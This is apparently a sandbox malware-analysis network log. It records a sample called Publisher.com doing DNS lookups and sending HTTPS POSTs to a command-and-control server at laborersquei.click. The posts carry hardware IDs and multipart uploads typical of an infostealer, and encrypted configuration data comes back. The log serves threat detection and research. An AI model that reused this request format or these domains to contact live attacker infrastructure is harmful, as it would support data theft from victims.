Dec 27, 2024 20:25:00.210906029 CET	1.1.1.1	192.168.2.5	0x863f	No error (0)	klipvumisui.shop		172.67.208.58	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:25:00.878155947 CET	1.1.1.1	192.168.2.5	0x5046	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

laborersquei.click

cegu.shop

klipvumisui.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49744	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:36 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: laborersquei.click
2024-12-27 19:24:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 19:24:36 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1emovhnm0jpspe35ev12p6l8cl; expires=Tue, 22 Apr 2025 13:11:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiSxq%2B%2FuothQgDygu4f6A8sbUBukeWPbSC5XD%2B9Dmuyb29jjPTAKbMfY5OwRpHKEFwkhINbpER%2FXNfvVyNgbrbO8MBp4chzKpF8Sr5oe0gJmFbIzYCkz3iQOZxwmF1HdfgZnkr8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb1181d710f8c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1792510&cwnd=212&unsent_bytes=0&cid=ca85e8be6765bf69&ts=798&x=0"
2024-12-27 19:24:36 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 19:24:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49750	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:38 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: laborersquei.click
2024-12-27 19:24:38 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2024-12-27 19:24:39 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=udd71btehabr8tkda7p7f9cra8; expires=Tue, 22 Apr 2025 13:11:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9iN%2BOn7u1PHvtHquzoJ5GscWUjIFQvXOaOk2cSWknYrh3UZb7E2lA1yFA5enDmEXvmdlq6VaLTqyAQ%2BU4%2Bz9cCZvUrtFj2X6ZXl87Z08vMwQzyQq6uc8kEU3vzYV1UTSGr5gIs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb1254aa632dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1417475&cwnd=241&unsent_bytes=0&cid=cb66cee0dbc89bfd&ts=841&x=0"
2024-12-27 19:24:39 UTC	242	IN	Data Raw: 34 36 63 0d 0a 2b 7a 30 56 38 75 4a 78 59 6f 4b 56 47 56 4f 53 4c 70 59 2f 64 6a 67 58 49 42 59 78 30 52 6f 4c 6d 76 4d 65 2b 76 6f 68 79 55 65 41 48 32 50 51 32 45 56 4f 6f 4f 5a 38 63 61 68 61 35 45 6f 54 46 44 56 42 63 68 50 72 66 47 72 32 67 48 76 57 32 46 65 6b 5a 63 46 62 64 4a 36 52 46 45 36 67 38 47 46 78 71 48 58 74 48 52 4e 57 4e 52 6f 30 56 4c 74 34 61 76 61 52 66 35 47 56 55 61 55 6b 6b 31 46 79 6d 6f 63 53 42 75 50 35 64 44 62 33 53 2f 64 56 47 46 46 36 53 48 73 54 2f 54 68 75 34 4e 45 6b 32 4c 64 45 76 53 61 32 58 47 61 5a 77 41 78 4f 2b 62 64 38 50 62 41 55 74 46 34 54 57 6e 74 47 63 6c 71 35 63 6d 50 2b 6b 48 71 51 69 6b 69 76 4c 35 4e 66 63 5a 75 4e 47 78 4c 75 38 33 4d 39 38 55 48 33 48 56 6f 61 63 Data Ascii: 46c+z0V8uJxYoKVGVOSLpY/djgXIBYx0RoLmvMe+vohyUeAH2PQ2EVOoOZ8caha5EoTFDVBchPrfGr2gHvW2FekZcFbdJ6RFE6g8GFxqHXtHRNWNRo0VLt4avaRf5GVUaUkk1FymocSBuP5dDb3S/dVGFF6SHsT/Thu4NEk2LdEvSa2XGaZwAxO+bd8PbAUtF4TWntGclq5cmP+kHqQikivL5NfcZuNGxLu83M98UH3HVoac
2024-12-27 19:24:39 UTC	897	IN	Data Raw: 6c 6f 30 43 2f 4d 72 57 2f 75 41 62 59 32 56 55 36 31 6c 68 68 46 75 30 49 63 66 51 4c 69 33 63 7a 33 2b 53 66 64 53 45 31 74 31 55 48 74 54 73 48 42 68 2f 4a 74 7a 6c 35 64 4e 6f 53 4b 52 56 6e 43 66 68 78 73 47 37 2f 51 37 66 37 42 4c 37 42 31 4d 47 6c 56 53 64 31 43 6e 64 58 69 34 6a 6a 4b 42 32 45 53 6e 5a 63 45 66 63 5a 36 42 48 67 44 79 2f 33 41 36 39 56 37 2f 56 42 6c 58 64 55 39 2b 58 4c 42 34 62 76 4b 62 63 35 4b 63 54 71 59 6a 6d 56 38 33 33 73 41 55 47 4b 43 76 4f 78 4c 31 58 50 4e 52 41 68 68 50 41 6d 73 64 71 6a 68 75 39 4e 45 6b 32 4a 42 47 71 43 61 53 55 48 53 59 69 77 45 41 38 76 46 32 4e 4f 4a 4b 38 56 4d 65 57 57 64 49 65 6c 57 77 63 57 4c 78 6c 48 75 63 32 41 33 72 49 6f 45 66 4c 39 43 68 48 67 76 73 2f 57 77 78 73 46 4f 36 52 46 52 64 Data Ascii: lo0C/MrW/uAbY2VU61lhhFu0IcfQLi3cz3+SfdSE1t1UHtTsHBh/Jtzl5dNoSKRVnCfhxsG7/Q7f7BL7B1MGlVSd1CndXi4jjKB2ESnZcEfcZ6BHgDy/3A69V7/VBlXdU9+XLB4bvKbc5KcTqYjmV833sAUGKCvOxL1XPNRAhhPAmsdqjhu9NEk2JBGqCaSUHSYiwEA8vF2NOJK8VMeWWdIelWwcWLxlHuc2A3rIoEfL9ChHgvs/WwxsFO6RFRd
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 34 62 30 32 0d 0a 65 30 56 69 45 36 77 32 63 4c 69 57 63 4e 6a 41 41 36 51 71 6c 6c 64 33 6b 59 51 65 42 4f 48 36 64 7a 6a 7a 51 50 68 56 47 56 5a 78 54 58 78 62 73 48 42 37 39 70 39 36 6e 70 68 47 36 32 76 5a 57 47 2f 51 32 46 4d 6b 37 75 42 76 4f 72 4a 35 39 31 4d 61 58 57 4d 43 61 78 32 71 4f 47 37 30 30 53 54 59 6c 6b 36 67 4b 5a 35 57 64 70 4f 41 47 51 37 76 2f 58 4d 35 38 45 48 31 56 68 78 63 65 45 6c 37 58 4c 52 77 61 76 53 55 63 5a 76 59 44 65 73 69 67 52 38 76 30 4b 55 64 41 2f 48 6d 4f 51 54 7a 51 76 70 61 41 68 70 71 44 47 30 54 74 48 51 70 6f 4e 46 32 6e 35 39 48 70 69 2b 61 57 33 4f 64 6a 78 6f 4a 36 65 56 78 50 66 35 65 2b 56 63 52 56 48 6c 48 65 31 4f 79 65 57 66 79 6d 6a 7a 57 32 45 53 7a 5a 63 45 66 57 4a 32 51 41 51 72 72 35 6a 6b 45 38 Data Ascii: 4b02e0ViE6w2cLiWcNjAA6Qqlld3kYQeBOH6dzjzQPhVGVZxTXxbsHB79p96nphG62vZWG/Q2FMk7uBvOrJ591MaXWMCax2qOG700STYlk6gKZ5WdpOAGQ7v/XM58EH1VhxceEl7XLRwavSUcZvYDesigR8v0KUdA/HmOQTzQvpaAhpqDG0TtHQpoNF2n59Hpi+aW3OdjxoJ6eVxPf5e+VcRVHlHe1OyeWfymjzW2ESzZcEfWJ2QAQrr5jkE8
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 4d 47 6c 70 42 59 6c 6e 7a 5a 79 66 68 30 58 75 55 32 42 76 72 4c 35 56 62 64 4a 79 4a 48 77 33 68 38 33 77 38 39 45 7a 79 57 78 46 62 66 6b 70 34 58 4c 6c 30 62 66 53 59 65 70 53 62 51 4b 31 6c 31 78 39 77 69 4d 42 4c 51 4d 48 36 63 44 33 77 54 2b 56 61 56 42 51 31 54 48 4a 54 38 79 42 2f 36 49 5a 37 68 39 5a 61 36 79 4b 56 48 79 2f 51 69 67 45 46 37 76 4e 78 4e 50 52 41 2f 6c 30 52 53 48 31 45 63 31 2b 37 66 57 62 2b 6c 48 47 66 6b 30 43 35 4e 35 70 62 65 5a 7a 41 58 55 44 6e 37 7a 74 70 73 47 6e 6a 58 67 52 63 64 67 4a 72 48 61 6f 34 62 76 54 52 4a 4e 69 59 54 61 63 75 6e 6c 52 38 6c 49 51 54 44 65 76 35 64 54 6a 38 52 50 68 61 42 6c 64 77 53 6e 35 61 74 6e 52 6b 2b 34 4e 2f 6d 64 67 4e 36 79 4b 42 48 79 2f 51 70 79 41 33 77 37 64 6b 66 2b 6b 4d 38 31 Data Ascii: MGlpBYlnzZyfh0XuU2BvrL5VbdJyJHw3h83w89EzyWxFbfkp4XLl0bfSYepSbQK1l1x9wiMBLQMH6cD3wT+VaVBQ1THJT8yB/6IZ7h9Za6yKVHy/QigEF7vNxNPRA/l0RSH1Ec1+7fWb+lHGfk0C5N5pbeZzAXUDn7ztpsGnjXgRcdgJrHao4bvTRJNiYTacunlR8lIQTDev5dTj8RPhaBldwSn5atnRk+4N/mdgN6yKBHy/QpyA3w7dkf+kM81
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 62 6e 64 63 75 44 68 32 74 6f 67 38 6e 35 51 44 38 32 57 65 56 33 2b 65 67 78 55 4c 37 50 74 36 4f 50 5a 4a 2f 46 6f 62 58 58 78 46 64 46 57 68 66 32 54 78 6b 58 65 52 6b 6b 65 71 4c 74 6b 52 4e 35 65 59 55 31 69 67 78 58 77 6e 34 45 2b 30 51 6c 70 44 4e 55 56 34 45 2b 73 34 5a 4f 71 51 65 59 71 63 54 4b 41 33 6b 6c 6c 33 6c 5a 49 55 44 4f 72 34 65 44 6e 39 54 2f 78 50 46 46 64 31 55 47 5a 56 75 48 59 70 74 74 46 37 67 4e 67 62 36 78 53 4f 56 44 65 50 7a 67 70 41 35 2f 73 37 61 62 42 50 2f 6c 41 61 53 48 46 45 66 31 43 39 63 47 7a 77 6c 58 61 56 6c 30 69 68 4c 4a 46 66 65 4a 57 49 47 41 62 75 39 6e 30 39 2f 51 79 36 48 52 4e 43 4e 52 6f 30 64 4b 6c 31 62 2b 2b 41 53 5a 2b 59 45 75 73 36 31 30 59 33 6c 34 78 54 57 4b 44 36 64 7a 76 39 53 66 42 56 45 31 6c Data Ascii: bndcuDh2tog8n5QD82WeV3+egxUL7Pt6OPZJ/FobXXxFdFWhf2TxkXeRkkeqLtkRN5eYU1igxXwn4E+0QlpDNUV4E+s4ZOqQeYqcTKA3kll3lZIUDOr4eDn9T/xPFFd1UGZVuHYpttF7gNgb6xSOVDePzgpA5/s7abBP/lAaSHFEf1C9cGzwlXaVl0ihLJFfeJWIGAbu9n09/Qy6HRNCNRo0dKl1b++ASZ+YEus610Y3l4xTWKD6dzv9SfBVE1l
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 37 52 30 4b 61 44 52 63 70 57 65 51 71 6f 74 6b 56 39 78 6d 6f 51 51 43 65 50 77 63 6a 66 37 54 2f 35 53 45 31 78 78 51 6e 39 55 76 58 35 73 38 35 67 38 31 74 68 45 73 32 58 42 48 31 47 7a 6b 67 45 79 37 76 52 67 63 65 38 43 37 52 30 54 56 6a 55 61 4e 46 69 37 64 33 76 39 6d 48 53 63 6b 55 4f 76 4c 35 52 59 64 35 57 4e 46 67 54 75 38 33 77 78 2f 45 50 7a 56 52 74 65 64 55 30 30 48 66 4e 2f 63 62 6a 4a 50 4c 69 54 56 59 6f 72 6b 6b 30 33 6a 38 34 4b 51 4f 66 37 4f 32 6d 77 51 76 31 63 48 46 52 35 53 6e 42 42 73 33 4e 67 39 35 42 7a 6d 4a 74 43 6f 53 32 4c 57 58 65 62 69 42 51 49 35 50 6c 70 4d 50 38 4d 75 68 30 54 51 6a 55 61 4e 47 4b 6c 66 32 37 33 30 31 57 66 67 30 4b 68 4a 70 4a 54 4e 34 2f 4f 43 6b 44 6e 2b 7a 74 70 73 45 48 34 55 42 42 49 65 55 4a 30 Data Ascii: 7R0KaDRcpWeQqotkV9xmoQQCePwcjf7T/5SE1xxQn9UvX5s85g81thEs2XBH1GzkgEy7vRgce8C7R0TVjUaNFi7d3v9mHSckUOvL5RYd5WNFgTu83wx/EPzVRtedU00HfN/cbjJPLiTVYorkk03j84KQOf7O2mwQv1cHFR5SnBBs3Ng95BzmJtCoS2LWXebiBQI5PlpMP8Muh0TQjUaNGKlf27301Wfg0KhJpJTN4/OCkDn+ztpsEH4UBBIeUJ0
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 6e 7a 6e 33 6d 5a 6c 45 6d 73 4b 34 74 65 66 5a 79 42 46 41 66 72 35 58 41 6a 2b 30 54 33 55 78 78 54 64 55 78 30 55 72 35 34 4b 62 62 52 65 34 44 59 47 2b 73 41 75 6b 68 68 6d 73 49 77 46 2f 62 39 66 44 33 6d 52 2f 56 65 41 6c 64 6c 41 6a 6f 54 6f 6e 39 34 75 4d 6c 71 69 49 39 45 74 47 75 41 48 33 43 63 77 45 74 41 36 2f 68 31 50 50 74 49 2f 56 67 63 57 58 42 48 66 6c 2b 2f 65 57 48 78 6d 33 6d 64 6e 6b 6d 6f 4b 35 5a 65 65 35 53 4a 48 51 6d 67 75 54 73 32 36 41 79 73 48 53 4a 4b 63 6c 70 35 51 2f 46 4b 61 75 6d 41 61 5a 57 49 52 65 6b 4b 6d 6c 4e 30 6c 59 63 44 51 50 2b 35 59 6e 48 33 51 4c 51 46 56 46 70 78 54 6e 64 55 76 58 64 6b 39 35 5a 33 6c 35 4a 4e 75 53 71 63 56 33 75 59 6a 51 45 4b 36 75 56 79 4f 50 31 43 2f 45 38 58 47 6a 73 43 63 30 76 7a 49 Data Ascii: nzn3mZlEmsK4tefZyBFAfr5XAj+0T3UxxTdUx0Ur54KbbRe4DYG+sAukhhmsIwF/b9fD3mR/VeAldlAjoTon94uMlqiI9EtGuAH3CcwEtA6/h1PPtI/VgcWXBHfl+/eWHxm3mdnkmoK5Zee5SJHQmguTs26AysHSJKclp5Q/FKaumAaZWIRekKmlN0lYcDQP+5YnH3QLQFVFpxTndUvXdk95Z3l5JNuSqcV3uYjQEK6uVyOP1C/E8XGjsCc0vzI
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 43 70 72 68 49 76 53 53 55 56 48 75 75 76 67 59 44 37 76 6c 38 4a 2b 45 4d 75 68 30 62 47 69 31 37 4e 42 76 7a 52 79 65 34 69 54 7a 41 32 48 61 6f 4b 35 64 59 59 59 48 4e 4d 77 76 32 39 6e 59 36 2f 41 37 31 55 41 52 64 4e 51 77 30 56 66 4d 67 4f 62 62 52 65 49 6e 59 47 2f 74 33 77 67 6f 6b 78 39 42 42 48 36 37 75 4f 79 65 77 46 4b 59 54 56 45 67 31 47 6a 51 55 73 47 70 37 2f 70 4a 71 6d 39 39 39 6c 51 57 53 55 33 53 63 67 52 52 41 72 72 64 30 63 61 68 31 74 46 34 47 53 44 70 54 59 6c 36 6a 66 79 58 77 67 48 47 55 32 41 33 72 61 5a 31 55 65 35 57 48 41 30 2f 79 35 33 41 39 35 67 44 77 54 31 51 55 4e 56 4e 2f 58 4b 46 32 62 72 65 41 61 70 57 49 51 4b 34 69 31 56 64 6d 6e 59 78 54 54 71 44 69 63 44 33 32 51 65 45 53 42 55 78 32 56 48 4d 66 75 32 6c 6b 39 4e Data Ascii: CprhIvSSUVHuuvgYD7vl8J+EMuh0bGi17NBvzRye4iTzA2HaoK5dYYYHNMwv29nY6/A71UARdNQw0VfMgObbReInYG/t3wgokx9BBH67uOyewFKYTVEg1GjQUsGp7/pJqm999lQWSU3ScgRRArrd0cah1tF4GSDpTYl6jfyXwgHGU2A3raZ1Ue5WHA0/y53A95gDwT1QUNVN/XKF2breAapWIQK4i1VdmnYxTTqDicD32QeESBUx2VHMfu2lk9N
2024-12-27 19:24:39 UTC	1369	IN	Data Raw: 57 2b 74 39 32 57 70 30 6e 6f 34 55 46 76 47 36 58 54 4c 33 53 76 64 54 41 30 73 31 44 44 52 56 38 79 41 37 74 74 46 34 69 64 67 62 2b 33 66 43 43 69 54 48 30 45 45 66 72 75 34 37 4a 37 41 55 70 78 4e 55 53 44 55 61 4e 42 53 39 64 57 6a 37 6e 33 2b 4b 69 6b 57 6f 4d 35 6f 59 53 61 36 6c 48 67 33 6c 2b 58 77 50 7a 6d 33 2b 54 52 6c 56 63 6e 78 4b 5a 4b 4a 2f 65 62 71 33 66 34 36 62 41 2b 56 6c 67 52 38 76 30 4b 45 5a 45 4f 33 34 66 48 47 2b 44 50 41 64 54 42 70 51 54 33 6c 57 76 58 38 72 32 5a 74 73 6c 5a 64 45 36 32 76 5a 55 7a 66 49 77 42 49 4b 38 50 70 30 4e 72 78 4c 37 6c 70 55 46 44 56 4d 4e 41 76 7a 65 57 50 6f 6e 48 4f 66 31 45 57 6c 4b 39 6c 41 4f 59 6e 41 42 55 43 34 70 44 56 78 34 67 79 73 48 56 4e 55 65 45 4e 33 58 62 42 71 65 2f 36 53 61 70 76 Data Ascii: W+t92Wp0no4UFvG6XTL3SvdTA0s1DDRV8yA7ttF4idgb+3fCCiTH0EEfru47J7AUpxNUSDUaNBS9dWj7n3+KikWoM5oYSa6lHg3l+XwPzm3+TRlVcnxKZKJ/ebq3f46bA+VlgR8v0KEZEO34fHG+DPAdTBpQT3lWvX8r2ZtslZdE62vZUzfIwBIK8Pp0NrxL7lpUFDVMNAvzeWPonHOf1EWlK9lAOYnABUC4pDVx4gysHVNUeEN3XbBqe/6Sapv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49756	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:41 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XRAUCISNFQO2D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12804 Host: laborersquei.click
2024-12-27 19:24:41 UTC	12804	OUT	Data Raw: 2d 2d 58 52 41 55 43 49 53 4e 46 51 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 58 52 41 55 43 49 53 4e 46 51 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 52 41 55 43 49 53 4e 46 51 4f 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 58 52 41 55 43 49 53 4e 46 51 4f 32 Data Ascii: --XRAUCISNFQO2DContent-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--XRAUCISNFQO2DContent-Disposition: form-data; name="pid"2--XRAUCISNFQO2DContent-Disposition: form-data; name="lid"hRjzG3--TRON--XRAUCISNFQO2
2024-12-27 19:24:42 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r6rd5s656ek4k9numrv7cp4g24; expires=Tue, 22 Apr 2025 13:11:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TuoM4NrKsV6qekWcG4CREJzeYMBzDJfBd3s9GCenSWuNgsZ6jRbkFDnHxTTf9iX8WRglKYiGS91a5aogM9%2FPdLL6Qko8irEgAr5IILJlN7b8Py4xw8lsgBtco8RwcKu8G7v60xE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb135ebe33300-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2027&rtt_var=780&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13741&delivery_rate=1385199&cwnd=236&unsent_bytes=0&cid=51493d40f46835a9&ts=1888&x=0"
2024-12-27 19:24:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 19:24:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49763	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:44 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VOXJSLGLRZY1I616 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: laborersquei.click
2024-12-27 19:24:44 UTC	15064	OUT	Data Raw: 2d 2d 56 4f 58 4a 53 4c 47 4c 52 5a 59 31 49 36 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 56 4f 58 4a 53 4c 47 4c 52 5a 59 31 49 36 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4f 58 4a 53 4c 47 4c 52 5a 59 31 49 36 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 56 4f 58 Data Ascii: --VOXJSLGLRZY1I616Content-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--VOXJSLGLRZY1I616Content-Disposition: form-data; name="pid"2--VOXJSLGLRZY1I616Content-Disposition: form-data; name="lid"hRjzG3--TRON--VOX
2024-12-27 19:24:45 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7e7jj087i0flpd1sd7979977ib; expires=Tue, 22 Apr 2025 13:11:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NQ%2B8gEDhnm7Brf1uakVf1vqDgKz1ZNBzsCQHGuGeCOmwDbUzxOmPn21lTRJsOLctzA%2BC9tZhPj5tMWv0%2Fef4PxSRRYU8Rhw%2BXmFAzSiE0FuzGWd7RMSlWk%2F%2F4Z%2B4S0daNUaFcuU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb149ab0142c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1594&rtt_var=621&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16004&delivery_rate=1831869&cwnd=240&unsent_bytes=0&cid=1c09cd7d2e6ce9b2&ts=844&x=0"
2024-12-27 19:24:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 19:24:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49769	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:46 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HA4OO9J9X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20512 Host: laborersquei.click
2024-12-27 19:24:46 UTC	15331	OUT	Data Raw: 2d 2d 48 41 34 4f 4f 39 4a 39 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 48 41 34 4f 4f 39 4a 39 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 41 34 4f 4f 39 4a 39 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 